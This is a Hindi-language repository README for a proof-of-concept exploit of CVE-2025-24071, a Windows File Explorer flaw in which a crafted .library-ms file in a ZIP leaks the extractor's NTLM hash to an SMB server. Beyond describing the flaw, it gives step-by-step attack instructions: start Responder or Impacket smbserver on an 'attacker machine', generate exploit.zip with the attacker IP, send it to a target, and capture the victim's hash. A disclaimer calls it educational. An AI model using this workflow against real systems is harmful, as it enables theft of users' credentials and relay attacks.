
यह CVE-2025-24071 के लिए एक python PoC स्क्रिप्ट है, जो Windows File Explorer में एक कमजोरी है जो NTLM एक्सपोजर जैसी संवेदनशील जानकारी तक अनधिकृत पहुंच की अनुमति देती है।
CVE-2025-24071 विंडोज फ़ाइल एक्सप्लोरर में एक कमजोरी है जो NTLM हैश के अनधिकृत प्रकटीकरण की अनुमति देती है। जब कोई उपयोगकर्ता एक विशेष रूप से तैयार .zip संग्रह निकालता है जिसमें एक दुर्भावनापूर्ण .library-ms फ़ाइल होती है, तो विंडोज एक्सप्लोरर स्वचालित रूप से उस फ़ाइल को पार्स करता है और हमलावर-नियंत्रित सर्वर पर एक SMB प्रमाणीकरण अनुरोध शुरू करता है, जिससे बिना किसी अतिरिक्त उपयोगकर्ता इंटरैक्शन के पीड़ित का NTLM हैश लीक हो जाता है।
| गुण | मान |
|---|---|
| CVE ID | CVE-2025-24071 |
| प्रकार | NTLM हैश प्रकटीकरण / सूचना लीक |
| हमला वेक्टर | स्थानीय (उपयोगकर्ता को ZIP निकालने की आवश्यकता) |
| उपयोगकर्ता इंटरैक्शन | न्यूनतम (केवल संग्रह निकालें) |
| प्रभाव | NTLM क्रेडेंशियल चोरी, संभावित रिले हमले |
.library-ms फ़ाइल बनाता है.zip संग्रह में पैकेज करता है.library-ms फ़ाइल को पार्स करता हैhttps://github.com/user-attachments/assets/e71ea7f7-c739-46f1-9e91-1f3b13b21596
नोट: यदि वीडियो इनलाइन नहीं चलता है, तो इस रिपॉजिटरी से
PoC.mp4डाउनलोड करें।
smbserver.py)रिपॉजिटरी क्लोन करें
git clone https://github.com/yourusername/CVE-2025-24071.git
cd CVE-2025-24071
अपना SMB श्रोता शुरू करें (हमलावर मशीन पर)
# Responder का उपयोग करके
sudo responder -I eth0
# या Impacket का उपयोग करके
sudo python3 smbserver.py -smb2support fakeShare /tmp/share
एक्सप्लॉइट जनरेट करें
python exploit.py
संकेत मिलने पर अपना हमलावर IP दर्ज करें
exploit.zip को लक्ष्य पर भेजें
जब पीड़ित संग्रह निकाले तो NTLM हैश कैप्चर करें
CVE-2025-24071/
├── exploit.py # PoC एक्सप्लॉइट जनरेटर
├── PoC.mp4 # वीडियो प्रदर्शन
└── README.md # दस्तावेज़ीकरण
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
Nyx0r-PoC
यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है। जिम्मेदारी से उपयोग करें।
⭐ यदि यह रिपॉजिटरी आपको उपयोगी लगी तो इसे स्टार करें!